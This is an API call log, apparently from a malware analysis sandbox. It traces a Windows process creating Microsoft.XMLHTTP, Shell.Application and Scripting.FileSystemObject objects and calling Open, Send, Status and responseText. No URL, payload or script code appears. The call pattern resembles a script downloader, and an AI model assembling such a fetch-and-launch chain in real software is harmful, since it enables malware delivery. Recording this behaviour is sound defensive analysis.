	[0550.911] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0550.912] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0556.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0556.997] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0556.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0556.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0556.997] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0556.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0556.998] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0556.998] SysStringLen (param_1=0x0) returned 0x0
	[0556.998] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0556.998] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0556.998] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0556.998] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0556.998] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0556.998] ??2@YAPEAX_K@Z () returned 0x62f350
	[0556.998] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0556.998] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0556.998] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0556.998] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0556.998] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0556.998] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0556.998] SysStringLen (param_1=0x0) returned 0x0
	[0556.999] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0557.002] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0557.002] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0557.002] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0557.002] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0557.002] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0557.002] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0558.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0558.791] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0558.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0558.793] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0558.793] SysStringLen (param_1=0x0) returned 0x0
	[0558.793] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0558.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0558.793] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0558.793] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0558.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0558.793] ??2@YAPEAX_K@Z () returned 0x62f330
	[0558.793] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0558.793] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0558.793] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0558.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0558.793] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0558.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0558.794] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0558.796] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0558.796] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0558.796] SysStringLen (param_1=0x0) returned 0x0
	[0558.796] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0558.796] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0558.796] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0558.797] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0558.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0558.797] ??2@YAPEAX_K@Z () returned 0x62f310
	[0558.797] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f310) 
	[0558.797] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0558.797] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0558.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0558.797] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0558.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0558.797] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0558.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0558.798] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0558.798] SysStringLen (param_1=0x0) returned 0x0
	[0558.798] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0558.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0558.798] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7330) returned 0x0
	[0558.798] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0558.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5be8) returned 0x0
	[0558.798] ??2@YAPEAX_K@Z () returned 0x62f330
	[0558.798] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5be8, pUnkSite=0x62f330) 
	[0558.798] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0558.798] XMLHTTPRequest:IUnknown:Release (This=0x49c5be8) returned 0x0
	[0558.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7330) returned 0x0
	[0558.798] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7330) returned 0x3
	[0558.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0558.798] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7330, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0558.799] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0558.799] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0558.799] SysStringLen (param_1=0x0) returned 0x0
	[0558.799] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0558.799] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0558.799] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0558.799] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0558.799] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0558.799] ??2@YAPEAX_K@Z () returned 0x62f310
	[0558.799] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0558.799] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0558.799] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0558.799] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0558.799] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0558.799] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0558.800] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0558.800] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0558.800] longjmp () 
	[0558.800] longjmp () 
	[0558.800] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0558.800] SysStringLen (param_1=0x0) returned 0x0
